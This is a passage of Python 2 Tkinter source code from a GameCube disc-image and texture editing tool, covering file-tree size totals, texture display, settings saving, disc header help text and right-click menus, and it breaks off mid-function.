	""" Recursive helper to total up the combined byte size and file count of everything
		under a given set of treeview children. Items already present in the user's
		selection are skipped so they aren't counted twice. """
	sizeTotal = 0
	count = 0
	for childIid in folder:
		# Skip anything that's part of the selection itself, so nothing is counted twice
		if childIid in iidSelectionsTuple: continue
		itemValues = Gui.isoFileTree.item( childIid, 'values' ) # ( description, entity, isoOffset, fileSize, isoPath, source, data )
		if itemValues[1] == 'file':
			sizeTotal = sizeTotal + int( itemValues[3] )
			count = count + 1
		else: # A folder; recurse into it and fold its totals into the running count
			innerSize, innerCount = scanDiscItemForStats( iidSelectionsTuple, Gui.isoFileTree.get_children(childIid) )
			sizeTotal = sizeTotal + innerSize
			count = count + innerCount
	return sizeTotal, count
def onFileTreeSelect( event ):
	""" Called when the selection in the Disc File Tree changes. Totals the size and
		count of the selected files/folders and updates the Disc Offset and File Size
		labels in the GUI accordingly. """
	iidSelectionsTuple = Gui.isoFileTree.selection()
	if len( iidSelectionsTuple ) != 0:
		# Get the collective size of all items currently selected
		totalFileSize = 0
		fileCount = 0
		for iid in iidSelectionsTuple:
			_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
			if entity == 'file':
				totalFileSize += int( fileSize )
				fileCount += 1
			else:
				# A folder; recursively total the files within (skipping any selected children, to avoid double-counting)
				folderSize, folderFileCount = scanDiscItemForStats( iidSelectionsTuple, Gui.isoFileTree.get_children(iid) )
				totalFileSize += folderSize
				fileCount += folderFileCount
		# Update the Offset and File Size values in the GUI.
		# (entity/isoOffset/isoPath below deliberately use the loop's last -- i.e. only -- iteration)
		if len( iidSelectionsTuple ) == 1 and entity == 'file': # If there's only one selection and it's a file.
			fileName = isoPath.split('/')[-1].lower()
			if isoOffset == '0' and fileName != 'boot.bin' and fileName != 'iso.hdr': isoOffset = 'N/A (External)' # Must be an external file.
			Gui.isoOffsetText.set( 'Disc Offset: ' + isoOffset )
			Gui.internalFileSizeText.set( 'File Size: {0:,} bytes'.format(totalFileSize) ) # Formatting in decimal with thousands delimiter commas
			Gui.internalFileSizeLabelSecondLine.set( '' )
		else: # A folder or multiple selections
			Gui.isoOffsetText.set( 'Disc Offset: N/A' )
			Gui.internalFileSizeText.set( 'File Size: {0:,} bytes'.format(totalFileSize) ) # Formatting in decimal with thousands delimiter commas
			Gui.internalFileSizeLabelSecondLine.set( ' (Totaled from {0:,} files)'.format(fileCount) )
def drawTextureToMainDisplay( iid ):
	""" Updates the main display area (the Image tab of the DAT Texture Tree tab) with a
		texture's stored full-render image, if it has been rendered.

		Also grows the canvas and root window as needed so the texture fits (the window
		is never shrunk back down here). """
	# Get the texture data if available, and pull info on the texture.
	textureImage = Gui.datTextureTree.fullTextureRenders.get( int(iid) )
	if not textureImage:
		print 'did not get a texture image'
		return # May not have been rendered yet
	imageDataOffset, imageDataLength, textureWidth, textureHeight, imageType = parseTextureDetails( iid )
	# Get the current dimensions of the program.
	Gui.textureDisplay.update() # Ensures the info gathered below is accurate
	programWidth = Gui.root.winfo_width()
	programHeight = Gui.root.winfo_height()
	canvasWidth = Gui.textureDisplay.winfo_width()
	canvasHeight = Gui.textureDisplay.winfo_height()
	# Get the total width/height used by everything other than the canvas.
	baseW = Gui.defaultWindowWidth - canvasWidth
	baseH = programHeight - canvasHeight
	# Set the new program and canvas widths. (The +2 allows space for a texture border.)
	if textureWidth > canvasWidth:
		newProgramWidth = baseW + textureWidth + 2
		newCanvasWidth = textureWidth + 2
	else: # Texture already fits; keep the current sizes
		newProgramWidth = programWidth
		newCanvasWidth = canvasWidth
	# Set the new program and canvas heights. (The +2 allows space for a texture border.)
	if textureHeight > canvasHeight:
		newProgramHeight = baseH + textureHeight + 2
		newCanvasHeight = textureHeight + 2
	else: # Texture already fits; keep the current sizes
		newProgramHeight = programHeight
		newCanvasHeight = canvasHeight
	# Apply the new sizes for the canvas and root window.
	Gui.textureDisplay.configure( width=newCanvasWidth, height=newCanvasHeight ) # Adjusts the canvas size to match the texture.
	Gui.root.geometry( str(newProgramWidth) + 'x' + str(newProgramHeight) )
	# Delete current contents of the canvas, and redraw the grid if it's enabled
	Gui.textureDisplay.delete( 'all' )
	Gui.updateCanvasGrid( saveChange=False )
	# Add the texture image to the canvas, and draw the texture boundary if it's enabled
	Gui.textureDisplay.create_image(newCanvasWidth/2, newCanvasHeight/2, anchor='center', image=textureImage, tags='texture')
	updateCanvasTextureBoundary( saveChange=False )
def updateCanvasTextureBoundary( saveChange=True ): # Show/hide the border around textures.
	""" Draws or removes the blue boundary rectangle around the texture on the main display
		canvas, according to the 'showTextureBoundary' setting.

		saveChange: when True, also persists the current checkbox state to the settings file.

		Fixes two defects in the prior version: delete() was given the tuple returned by
		find_withtag() as a single argument, which Tk treats as one (unmatchable) tagOrId,
		so old borders were never actually removed; and repeated calls stacked duplicate
		rectangles. Deleting by the 'border' tag handles both. """
	# Always clear any previously drawn border first (deleting by tag removes all matching items)
	Gui.textureDisplay.delete( 'border' )
	if generalBoolSettings['showTextureBoundary'].get():
		coords = Gui.textureDisplay.bbox('texture') # "bounding box" gets the coordinates of the item(s).
		if coords != None:
			x1, y1, x2, y2 = coords
			Gui.textureDisplay.create_rectangle( x1 - 1, y1 - 1, x2, y2, outline='blue', tags='border' ) # Expands the north/west borders by 1px, so they're not over the image.
	if saveChange:
		# Update the current selections in the settings file.
		with open( settingsFile, 'w') as theSettingsFile:
			settings.set( 'General Settings', 'showTextureBoundary', str(generalBoolSettings['showTextureBoundary'].get()) )
			settings.write( theSettingsFile )
def dndHandler( event, dropTarget ):
	""" Handles files drag-and-dropped onto the program window, forwarding them to fileHandler.

		event.data arrives as one string: each path is separated by a space, and paths
		containing spaces are enclosed in {} brackets. """
	# The paths that this event recieves are in one string, each enclosed in {} brackets (if they contain a space) and separated by a space. Turn this into a list.
	paths = event.data.replace('{', '').replace('}', '')
	# NOTE(review): splitting on the first path's drive prefix (e.g. 'C:') assumes all
	# dropped files share the same drive -- TODO confirm behavior for multi-drive drops.
	drive = paths[:2]
	filepaths = [drive + path.strip() for path in paths.split(drive) if path != '']
	Gui.root.deiconify() # Brings the main program window to the front (application z-order).
	fileHandler( filepaths, dropTarget=dropTarget )
def onMouseWheelScroll( event ):
	""" Checks the widget under the mouse when a scroll event occurs, and then looks through the GUI geometry
		for parent widgets that may have scroll wheel support. """
	# Cross-platform resources on scrolling:
	# - http://stackoverflow.com/questions/17355902/python-tkinter-binding-mousewheel-to-scrollbar
	# - https://www.daniweb.com/programming/software-development/code/217059/using-the-mouse-wheel-with-tkinter-python
	# Get the widget currently under the mouse
	widget = Gui.root.winfo_containing( event.x_root, event.y_root )
	# Traverse upwards through the parent widgets, looking for a scrollable widget
	while widget:
		# Check for a scrollable frame (winfo_class sees this as a regular Frame)
		if widget.__class__.__name__ == 'VerticalScrolledFrame':
			widget = widget.canvas # The inner canvas is the part that actually scrolls
			break
		elif widget.winfo_class() in ( 'Text', 'Treeview' ):
			break
		widget = widget.master
	# If the above loop didn't break (no scrollable found), "widget" will reach the top level item and become 'None'.
	if widget:
		# Scale the OS-reported wheel delta down to scroll units (sign flipped so wheel-up scrolls up)
		widget.yview_scroll( -1*(event.delta/30), "units" )
def saveSettingsToFile():
	""" Updates a pre-existing settings file (or creates a new one if none exists)
		with the program's current settings. """
	# Mirror the program's BooleanVars into the settings object, as strings
	for settingName in generalBoolSettingsDefaults:
		currentValue = generalBoolSettings[settingName].get()
		settings.set( 'General Settings', settingName, str(currentValue) )
	# Write everything out to disk
	with open( settingsFile, 'w') as settingsFileHandle:
		settings.write( settingsFileHandle )
def showUnsavedChanges():
	""" Reports all pending (unsaved) DAT, banner file, and disc changes to the user,
		in a scrollable message window if there are details to show. """
	messageSections = []
	anyPending = False
	# Pending DAT file changes
	if globalDatFile and globalDatFile.unsavedChanges:
		messageSections.append( 'These DAT changes have not yet been saved:\n\n' + '\n'.join(globalDatFile.unsavedChanges) )
		anyPending = True
	else:
		messageSections.append( 'No DAT changes are waiting to be saved.' )
	# Pending banner file changes
	if globalBannerFile and globalBannerFile.unsavedChanges:
		messageSections.append( 'These banner file changes have not yet been saved:\n\n' + '\n'.join(globalBannerFile.unsavedChanges) )
		anyPending = True
	else:
		messageSections.append( 'No banner file changes are waiting to be saved.' )
	# Pending disc changes
	if unsavedDiscChanges:
		messageSections.append( 'These disc changes have not yet been saved:\n\n' + '\n'.join(unsavedDiscChanges) )
		anyPending = True
	else:
		messageSections.append( 'No disc changes are waiting to be saved.' )
	if anyPending:
		cmsg( '\n\n'.join(messageSections) ) # Scrollable message window, for potentially long lists
	else:
		msg( 'No changes are waiting to be saved.' )
def updateProgramStatus( newStatus ):
	""" Sets the status message at the bottom of the main window, colored red if any
		changes are waiting to be saved, or green otherwise. A non-empty message whose
		first word is 'dontUpdate' is ignored. """
	# Guard clause: skip messages explicitly flagged to not update the status
	if newStatus != '' and newStatus.split()[0] == 'dontUpdate':
		return
	# Red if any disc, DAT, or banner file changes are pending save; green otherwise
	changesPending = ( unsavedDiscChanges
		or ( globalDatFile and globalDatFile.unsavedChanges )
		or ( globalBannerFile and globalBannerFile.unsavedChanges ) )
	if changesPending:
		statusColor = '#a34343' # red; some change(s) not yet saved.
	else:
		statusColor = '#292' # A green color, indicating no changes awaiting save.
	# Update the program status' color and message
	Gui.programStatusLabel['fg'] = statusColor
	Gui.programStatus.set( newStatus )
def togglePaletteCanvasColor( event ):
	""" Cycles the palette canvas background through white -> grey -> black, recoloring
		the descriptor text where needed so it stays legible against the new background. """
	currentColor = Gui.paletteCanvas['background']
	if currentColor == 'white':
		# White -> neutral grey; descriptor text color is left as-is
		Gui.paletteCanvas.configure( background='#7F7F7F' )
	elif currentColor == '#7F7F7F':
		# Grey -> black; switch descriptor text to white for contrast
		Gui.paletteCanvas.configure( background='black' )
		for descriptor in Gui.paletteCanvas.find_withtag( 'descriptors' ):
			Gui.paletteCanvas.itemconfig( descriptor, fill='white' )
	else:
		# Black (or anything else) -> white; switch descriptor text back to black
		Gui.paletteCanvas.configure( background='white' )
		for descriptor in Gui.paletteCanvas.find_withtag( 'descriptors' ):
			Gui.paletteCanvas.itemconfig( descriptor, fill='black' )
def scanDiscForFile( searchString, parentToSearch='' ):
	""" Recursively searches the Disc File Tree for an item whose file name portion
		starts with the given string (case-insensitive), returning its iid, or ''
		if nothing matches. """
	match = ''
	namePrefix = searchString.lower() # Hoisted out of the loop; iids are stored lowercased
	for childIid in Gui.isoFileTree.get_children( parentToSearch ):
		if childIid.split('/')[-1].startswith( namePrefix ):
			return childIid
		# This might be a folder; try scanning its children
		match = scanDiscForFile( searchString, childIid )
		if match: break
	# If looking for one of the header files, but it wasn't found, try for "ISO.hdr" instead
	# (used in place of boot.bin/bi2.bin by discs built by GCRebuilder)
	if not match and searchString in ( 'boot.bin', 'bi2.bin' ):
		match = scanDiscForFile( 'iso.hdr' )
	return match
def discFileTreeQuickLinks( event ):
	""" Scrolls the treeview in the Disc File Tree tab directly to a specific section.
		If a disc is not already loaded, the most recent disc that has been loaded in
		the program is loaded, and then scrolled to the respective section. """
	discNewlyLoaded = False
	# Check whether a disc is loaded.
	if globalDiscDetails['isoFilePath'] == '':
		# Check that there are any recently loaded discs (in the settings file).
		recentISOs = getRecentFilesLists()[0] # The resulting list is a list of tuples, of the form (path, dateLoaded)
		if not recentISOs:
			# No recent discs found. Prompt to open one.
			promptToOpenFile( 'iso' )
			discNewlyLoaded = True
		else: # ISOs found. Load the most recently used one
			recentISOs.sort( key=lambda recentInfo: recentInfo[1], reverse=True )
			pathToMostRecentISO = recentISOs[0][0].replace('|', ':') # Paths are stored with '|' in place of ':' in the settings file
			# Confirm the file still exists in the same place
			if os.path.exists( pathToMostRecentISO ):
				# Path validated. Load it. Don't update the details tab yet, since that will incur waiting for the banner animation
				fileHandler( [pathToMostRecentISO], updateDefaultDirectory=False, updateDetailsTab=False )
				discNewlyLoaded = True
			else: # If the file wasn't found above, prompt if they'd like to remove it from the remembered files list.
				if tkMessageBox.askyesno( 'Remove Broken Path?', 'The following file could not be found:\n"' + pathToMostRecentISO + '" .\n\nWould you like to remove it from the list of recent files?' ):
					# Update the list of recent ISOs in the settings object and settings file.
					settings.remove_option( 'Recent Files', pathToMostRecentISO.replace(':', '|') )
					with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
				return
	# Scroll to the appropriate section, if any link besides 'Last Disc' was used
	target = event.widget['text'] # The clicked shortcut label's text names the section
	scrollToSection( target )
	# If the disc was just now loaded, the banner and disc details will still need to be updated.
	# The function to scan the ISO will have deliberately skipped this step during the loading above,
	# so that scrolling will happen without having to wait on the banner animation.
	if discNewlyLoaded:
		Gui.isoFileTree.update() # Updates the GUI first so that the scroll position is instanly reflected
		populateDiscDetails()
def scrollToSection( target ):
	""" Scrolls the Disc File Tree to a named section of the disc ('System', 'Characters',
		'Menus (CSS/SSS)', or 'Stages'), selecting/focusing the item (or its parent folder)
		and bringing it into view.

		Fixes an off-by-one in the final bounds check: the previous '>' comparison allowed
		targetItemIndex == len(siblings) to fall through and raise an IndexError. """
	isoFileTreeChildren = Gui.isoFileTree.get_children()
	if not isoFileTreeChildren: return # No disc contents loaded; nothing to scroll
	gameId = globalDiscDetails['gameId'].lower()
	rootItem = isoFileTreeChildren[0]
	Gui.isoFileTree.see( rootItem )
	Gui.root.update()
	iid = ''
	indexOffset = 19 # Offsets the scroll target so the item lands near the top rather than centered
	# Determine the iid of the file to move the scroll position to
	if target == 'System':
		Gui.isoFileTree.yview_moveto( 0 )
		iid = scanDiscForFile( 'Start.dol' )
	elif target == 'Characters':
		if Gui.isoFileTree.exists( 'pl' ): # Check for the complimentary folder
			iidTuple = Gui.isoFileTree.get_children( 'pl' )
			if len( iidTuple ) > 0:
				iid = iidTuple[0]
		else:
			iid = scanDiscForFile( 'pl' ) # previously: 'plgk.dat'
	elif target == 'Menus (CSS/SSS)':
		iid = scanDiscForFile( 'mnmaall.' )
		indexOffset = 14
	elif target == 'Stages':
		if Gui.isoFileTree.exists( 'gr' ): # Check for the complimentary folder
			iidTuple = Gui.isoFileTree.get_children( 'gr' )
			if len( iidTuple ) > 0: iid = iidTuple[0]
		else:
			iid = scanDiscForFile( 'grbb.dat' )
			if not iid: iid = scanDiscForFile( 'grcn.dat' )
	if iid:
		targetItemIndex = Gui.isoFileTree.index( iid ) + indexOffset # Offset applied so that the target doesn't actually end up exactly in the center
		# Target the parent folder if it's in one
		if Gui.isoFileTree.parent( iid ) == gameId: # Means the target file is in root, not in a folder
			iidToSelect = iid
		else: iidToSelect = Gui.isoFileTree.parent( iid )
		# Set the current selection and keyboard focus
		Gui.isoFileTree.selection_set( iidToSelect )
		Gui.isoFileTree.focus( iidToSelect )
		targetItemSiblings = Gui.isoFileTree.get_children( Gui.isoFileTree.parent( iid ) )
		# Scroll to the target section (folders will be opened as necessary for visibility).
		# Use >= here: valid indices end at len()-1, so an index equal to len() must also clamp to the last sibling.
		if targetItemIndex >= len( targetItemSiblings ): Gui.isoFileTree.see( targetItemSiblings[-1] )
		else: Gui.isoFileTree.see( targetItemSiblings[targetItemIndex] )
def disallowLineBreaks( event ):
	""" Tkinter event handler. Returning the string 'break' halts further processing
		of the event, which prevents newline characters from being typed or pasted
		into the widget this is bound to. """
	return 'break'
def setDiscDetailsHelpText( updateName='' ):
	""" Updates the help/info text shown at the bottom of the Disc Details tab.

		updateName identifies which field the mouse is hovering over (e.g. 'Game ID',
		'Region Code'); an empty string restores the default hover prompt. The chosen
		text is written to the Gui.discDetailsTabHelpText StringVar, and the label's
		justification is adjusted for the multi-column/tabular entries. """

	Gui.discDetailsTab.helpTextLabel['justify'] = 'center' # The default. But changed for some cases

	if updateName == 'Game ID': helpText = ( "The game's primary identification code; this is what most applications and databases "
		"use to determine what game the disc is. It is composed of the 4 parts shown to the right of the value. "
		"You can change the Game ID for your own purposes, but note that many applications will no longer "
		"recognize it as the original game. [Contained in boot.bin at 0x0]" )
	elif updateName == 'Console ID':
		# Tab/newline formatted table; left-justify so the columns line up
		Gui.discDetailsTab.helpTextLabel['justify'] = 'left'
		helpText = ( '\t\tG: GameCube (standard)\n\t\tD: used by The Legend of Zelda: Ocarina of Time (Master Quest); \n\t\t (Might be '
			'an indicator for emulated/ported/promotional titles.)\n\t\tU: Used by GBA-Player Boot CD' )
	elif updateName == 'Game Code': helpText = ( 'An ID/serial specific to just the game itself.' )
	elif updateName == 'Region Code':
		Gui.discDetailsTab.helpTextLabel['justify'] = 'left'
		helpText = ( 'A: All,\tE: USA,\tJ: Japan,\tK: Korea,\tR: Russia,\tW: Taiwan\n'
			'D: ?,\tF: France,\tH: ?,\tI: ?,\tP: Europe\n'
			'U: Used by EU TLoZ:OoT(MQ)\tX: France/Germany?,\tY: ?,\tZ: ?\n'
			'\tFirst line = NTSC,\tSecond and third lines = PAL' )
	elif updateName == 'Maker Code':
		Gui.discDetailsTab.helpTextLabel['justify'] = 'left'
		helpText = ( 'i.e. The publisher...:\t\t01: Nintendo, 08: Capcom, 41: Ubisoft, 4F: Eidos, '
			'51: Acclaim, 52: Activision, 5D: Midway, 5G: Hudson, 64: Lucas Arts, '
			'69: Electronic Arts, 6S: TDK Mediactive, 8P: Sega, A4: Mirage Studios, AF: Namco, '
			'B2: Bandai, DA: Tomy, EM: Konami, WR: Warner Bros.' )
	elif updateName == 'Disc Revision': helpText = ( 'Sometimes games recieve some minor changes, such as bug fixes, throughout the time of their release. This number helps to keep track of those revisions.' )
	elif updateName == '20XX Version': helpText = ( 'This can also be determined in-game in the Debug Menu, or [beginning with v4.05] in the upper-right of the CSS.' )
	elif updateName == 'Total File Count': helpText = ( "The number of files in the disc's filesystem (excludes folders)." )
	elif updateName == 'Disc Size': helpText = ( 'Full file size of the GCM/ISO disc image. This differs from clicking on the root item in the Disc File Tree tab because the latter '
		'does not include inter-file padding.\nThe standard for GameCube discs is ~1.36 GB, or 1,459,978,240 bytes.' )
	elif updateName == 'Image Name': helpText = ( 'Disc/Image Name. This is what Nintendont uses to populate its game list.\n'
		'There is also a lot of free space here for a description or other notes. \n[Contained in boot.bin at 0x20.]' )
	elif updateName == 'Short Title': helpText = ( "The game's name. \n[Contained in opening.bnr at 0x1820.]" )
	elif updateName == 'Short Maker': helpText = ( 'The company/developer, game producer, and/or production date. \n[Contained in opening.bnr at 0x1840.]' )
	elif updateName == 'Long Title': helpText = ( "The game's full name. This is what Dolphin uses to display in its games list for the Title field. "
		"Remember to delete the cache file under '\\Dolphin Emulator\\Cache' to get this to update, or use the menu option in View -> Purge Game List Cache.\n[Contained in opening.bnr at 0x1860.]" )
	elif updateName == 'Long Maker': helpText = ( 'The company/developer, game producer, and/or production date. This is what Dolphin uses to display in its games list for the Maker field. '
		"Remember to delete the cache file under '\\Dolphin Emulator\\Cache' to get this to update, or use the menu option in View -> Purge Game List Cache.\n[Contained in opening.bnr at 0x18A0.]" )
	elif updateName == 'Comment': helpText = ( 'Known as "Description" in GCR, and simply "comment" in official Nintendo documentation. Originally, this was used to appear in the '
		"GameCube's BIOS (i.e. the IPL Main Menu; the menu you would see when booting the system while holding 'A'), as a short description before booting the game. \n[Contained in opening.bnr at 0x18E0.]" )
	else: helpText = "Hover over an item to view information on it.\nPress 'Enter' to submit changes in a text input field before saving."

	Gui.discDetailsTabHelpText.set( helpText )
#==============================#
# ~ ~ Main / Context Menus ~ ~ #
#==============================#
def createFileTreeContextMenu( event ):
	""" Builds and displays the right-click context menu for the Disc File Tree tab. """

	# No useful options to show if there is no disc to operate on
	if not discDetected( throwWarnings=False ): return

	menu = isoMenuOptions( Gui.root, tearoff=False )
	menu.repopulate()
	menu.post( event.x_root, event.y_root )
def createTextureTreeContextMenu( event ):
	""" Builds and displays the right-click context menu for the DAT Texture Tree tab. """

	# No useful options to show if there is no file to operate on
	if not globalDatFile: return

	menu = textureMenuOptions( Gui.root, tearoff=False )
	menu.repopulate()
	menu.post( event.x_root, event.y_root )
def createStructureTreeContextMenu( event ):
	""" Builds and displays the right-click context menu for the Structural Analysis tab. """

	# No useful options to show if there is no file to operate on
	if not globalDatFile: return

	menu = structureMenuOptions( Gui.root, tearoff=False )
	menu.repopulate()
	menu.post( event.x_root, event.y_root )
class fileMenu( Tk.Menu, object ):

	""" The 'File' pulldown of the main menu bar: open/save operations
		plus a dynamically rebuilt 'Open Recent' submenu. """

	def __init__( self, parent, tearoff=True, *args, **kwargs ):
		super( fileMenu, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
		self.open = False
		self.populated = False

		self.recentFilesMenu = Tk.Menu( self, tearoff=True ) # tearoff is the ability to turn the menu into a 'tools window'

		# Menu entries; trailing comments note each entry's keyboard accelerator (via underline index)
		self.add_cascade( label="Open Recent", menu=self.recentFilesMenu )
		self.add_command( label='Open Last Used Directory', underline=5, command=self.openLastUsedDir )		# L
		self.add_command( label='Open Disc (ISO/GCM)', underline=11, command=lambda: promptToOpenFile( 'iso' ) )	# I
		self.add_command( label='Open Root (Disc Directory)', underline=6, command=promptToOpenRoot )		# O
		self.add_command( label='Open DAT (or USD, etc.)', underline=5, command=lambda: promptToOpenFile( 'dat' ) )	# D
		self.add_separator()
		self.add_command( label='View Unsaved Changes', underline=0, command=showUnsavedChanges )		# V
		self.add_command( label='Save (CTRL-S)', underline=0, command=saveChanges )				# S
		self.add_command( label='Save Disc As...', underline=3, command=saveDiscAs )				# E
		self.add_command( label='Save DAT As...', underline=9, command=saveDatAs )				# A
		self.add_command( label='Save Banner As...', underline=5, command=saveBannerAs )			# B
		self.add_command( label='Run in Emulator (CTRL-R)', underline=0, command=runInEmulator )		# R
		self.add_command( label='Close', underline=0, command=onProgramClose )					# C

	@staticmethod
	def loadRecentFile( filepath ):
		""" This is the callback for clicking on a recent file to load from the recent files menu.
			Verifies files exist before loading. If they don't, ask to remove them from the list. """

		if os.path.exists( filepath ):
			fileHandler( [filepath], updateDefaultDirectory=False ) # fileHandler expects a list.

		else: # If the file wasn't found above, prompt if they'd like to remove it from the remembered files list.
			if tkMessageBox.askyesno( 'Remove Broken Path?', 'The following file could not be '
				'found:\n"' + filepath + '" .\n\nWould you like to remove it from the list of recent files?' ):
				# Update the list of recent ISOs in the settings object and settings file.
				# Note: ':' is stored as '|' in option names because ConfigParser can't use ':' there.
				settings.remove_option( 'Recent Files', filepath.replace(':', '|') )
				with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )

	def repopulate( self ):
		""" This will refresh the 'Open Recent' files menu. """

		# Depopulate the whole recent files menu
		self.recentFilesMenu.delete( 0, 'last' )

		# Collect the current [separate] lists of recent ISOs, and recent DAT (or other) files, and sort their contents in order of newest to oldest.
		ISOs, DATs = getRecentFilesLists() # Returns two lists of tuples (ISOs & DATs), where each tuple is a ( filepath, dateTimeObject )
		ISOs.sort( key=lambda recentInfo: recentInfo[1], reverse=True )
		DATs.sort( key=lambda recentInfo: recentInfo[1], reverse=True )

		# Add the recent ISOs to the dropdown menu, under a non-interactive header entry.
		self.recentFilesMenu.add_command( label=' - Disc Images and Root Folders:', background='#d0e0ff', activeforeground='#000000', activebackground='#d0e0ff' ) # default color: 'SystemMenu'
		for isosPath in ISOs:
			filepath = isosPath[0].replace( '|', ':' ) # Restore the ':' swapped out for settings-file storage
			# Display just "\parentFolder\filename" to keep the menu compact
			parentDirPlusFilename = '\\' + os.path.split( os.path.dirname( filepath ) )[-1] + '\\' + os.path.basename( filepath )
			# pathToLoad=filepath default binds the current value (avoids the late-binding closure pitfall)
			self.recentFilesMenu.add_command( label=parentDirPlusFilename, command=lambda pathToLoad=filepath: self.loadRecentFile(pathToLoad) )
		self.recentFilesMenu.add_separator()

		# Add the recent DATs to the dropdown menu.
		self.recentFilesMenu.add_command( label=' - DATs and Other Texture Data Files:', background='#d0e0ff', activeforeground='#000000', activebackground='#d0e0ff' )
		for datsPath in DATs:
			filepath = datsPath[0].replace( '|', ':' )
			parentDirPlusFilename = '\\' + os.path.split( os.path.dirname( filepath ) )[-1] + '\\' + os.path.basename( filepath )
			self.recentFilesMenu.add_command( label=parentDirPlusFilename, command=lambda pathToLoad=filepath: self.loadRecentFile(pathToLoad) )

	def openLastUsedDir( self ):
		""" Opens the directory that files were last opened from or saved to. """
		openFolder(settings.get( 'General Settings', 'defaultSearchDirectory' ))
class settingsMenu( Tk.Menu, object ):

	""" Once the checkbuttons have been created, they will stay updated in real time, since they're set using BoolVars. """

	def __init__( self, parent, tearoff=True, *args, **kwargs ): # Create the menu and its contents
		super( settingsMenu, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
		self.open = False

		# Trailing comments note each entry's keyboard accelerator (via underline index)
		self.add_command( label='Adjust Texture Filters', underline=15, command=setImageFilters )	# F

		# Add disc related options
		self.add_separator()
		# self.add_command(label='Set General Preferences', command=setPreferences)
		self.add_checkbutton( label='Use Disc Convenience Folders', underline=9, 			# C
			variable=generalBoolSettings['useDiscConvenienceFolders'], command=saveSettingsToFile )
		self.add_checkbutton( label='Avoid Rebuilding Disc', underline=0, 				# A
			variable=generalBoolSettings['avoidRebuildingIso'], command=saveSettingsToFile )
		self.add_checkbutton( label='Back-up Disc When Rebuilding', underline=0, 			# B
			variable=generalBoolSettings['backupOnRebuild'], command=saveSettingsToFile )
		self.add_checkbutton( label='Auto-Generate CSP Trim Colors', underline=5, 			# G
			variable=generalBoolSettings['autoGenerateCSPTrimColors'], command=saveSettingsToFile )

		# Add image-editing related options
		self.add_separator()
		# self.add_checkbutton( label='Dump Viewed PNGs', underline=0,
		# 	variable=generalBoolSettings['dumpPNGs'], command=saveSettingsToFile )			# D
		# self.add_checkbutton( label='Delete Image Dumps on Exit', underline=1,
		# 	variable=generalBoolSettings['deleteImageDumpsOnExit'], command=saveSettingsToFile )	# E
		self.add_checkbutton( label='Auto-Update Headers', underline=5,
			variable=generalBoolSettings['autoUpdateHeaders'], command=saveSettingsToFile )		# U
		self.add_checkbutton( label='Regenerate Invalid Palettes', underline=0,
			variable=generalBoolSettings['regenInvalidPalettes'], command=saveSettingsToFile )	# R
		self.add_checkbutton( label='Cascade Mipmap Changes', underline=8,
			variable=generalBoolSettings['cascadeMipmapChanges'], command=saveSettingsToFile )	# M
		self.add_checkbutton( label="Export Textures using Dolphin's Naming Convention", underline=32,
			variable=generalBoolSettings['useDolphinNaming'], command=saveSettingsToFile )		# N

	def repopulate( self ):
		""" Called each time the menu is opened; re-reads the settings file so the
			checkbutton states reflect any external/manual edits. """
		# Check the settings file, in case anything has been changed manually/externally.
		# Any changes from within the program will have updated these here as well.
		loadSettings()
class isoMenuOptions( Tk.Menu, object ):

	""" Context menu for the Disc File Tree tab. Rebuilt on every display so that the
		available options reflect the current treeview selection. """

	def __init__( self, parent, tearoff=True, *args, **kwargs ):
		super( isoMenuOptions, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
		self.open = False

	def repopulate( self ):
		""" This method will be called every time the submenu is displayed. """

		# Clear all current population
		self.delete( 0, 'last' )

		# Determine the kind of file(s)/folder(s) we're working with, to determine menu options
		self.iidSelectionsTuple = Gui.isoFileTree.selection()
		self.selectionCount = len( self.iidSelectionsTuple )
		if self.selectionCount == 1:
			self.entity = Gui.isoFileTree.item( self.iidSelectionsTuple[0], 'values' )[1] # 'file' or 'folder'
			self.filename = os.path.basename( self.iidSelectionsTuple[0] ) # All iids are lowercase
		else:
			self.entity = ''
			self.filename = ''
		lastSeperatorAdded = False

		# Check if this is a version of 20XX, and if so, get its main build number
		self.orig20xxVersion = globalDiscDetails['is20XX'] # This is an empty string if the version is not detected or it's not 20XX

		# Add main import/export options												# Keyboard shortcuts:
		if self.iidSelectionsTuple:
			self.add_command( label='Export File(s)', underline=0, command=exportIsoFiles )						# E
			self.add_command( label='Export Textures From Selected', underline=1, command=exportSelectedFileTextures )	# X
			self.add_command( label='Import File', underline=0, command=importSingleIsoFile )					# I
			self.add_command( label='Import Multiple Files', underline=7, command=importMultipleIsoFiles )			# M
			self.add_separator()

		# Add supplemental disc functions
		self.add_command( label='Add File(s) to Disc', underline=4, command=addFilesToIso )						# F
		self.add_command( label='Add Directory of File(s) to Disc', underline=4, command=addDirectoryOfFilesToIso )		# D
		self.add_command( label='Create Directory', underline=0, command=createDirectoryInIso )					# C
		if self.iidSelectionsTuple:
			if self.selectionCount == 1:
				if self.entity == 'file':
					self.add_command( label='Rename Selected File', underline=2, command=renameItem )			# N
				else:
					self.add_command( label='Rename Selected Folder', underline=2, command=renameItem )			# N

				if globalDiscDetails['is20XX'] and self.entity == 'file' and self.filename.startswith( 'gr' ): # A single stage file is chosen
					# Get the full case-sensitive file name
					iidValues = Gui.isoFileTree.item( self.iidSelectionsTuple[0], 'values' )
					fullFileName = iidValues[4].split( '/' )[-1] # 5th item in iidValues is isoPath

					if get20xxRandomNeutralNameOffset( fullFileName )[0] != -1:
						self.add_command( label='Rename Random Neutral Nickname', underline=16, command=self.renameRandomNeutralStage ) # U

			self.add_command( label='Remove Selected Item(s)', underline=0, command=removeItemsFromIso )			# R
			self.add_command( label='Move Selected to Directory', underline=1, command=moveSelectedToDirectory )		# O

		# Add file operations
		if self.selectionCount == 1 and self.entity == 'file':
			self.add_separator()
			self.add_command( label='View Hex', underline=5, command=viewFileHexFromFileTree )					# H
			self.add_command( label='Copy Offset to Clipboard', underline=2, command=self.copyFileOffsetToClipboard )	# P
			self.add_command( label='Browse Textures', underline=0, command=browseTexturesFromDisc )			# B
			self.add_command( label='Analyze Structure', underline=0, command=analyzeFileFromDisc )				# A

		elif self.selectionCount > 1:
			# Check if all of the items are files.
			# Fix: the original tested self.iidSelectionsTuple[0] on every iteration, so the
			# check passed whenever just the FIRST selected item was a file; test each iid.
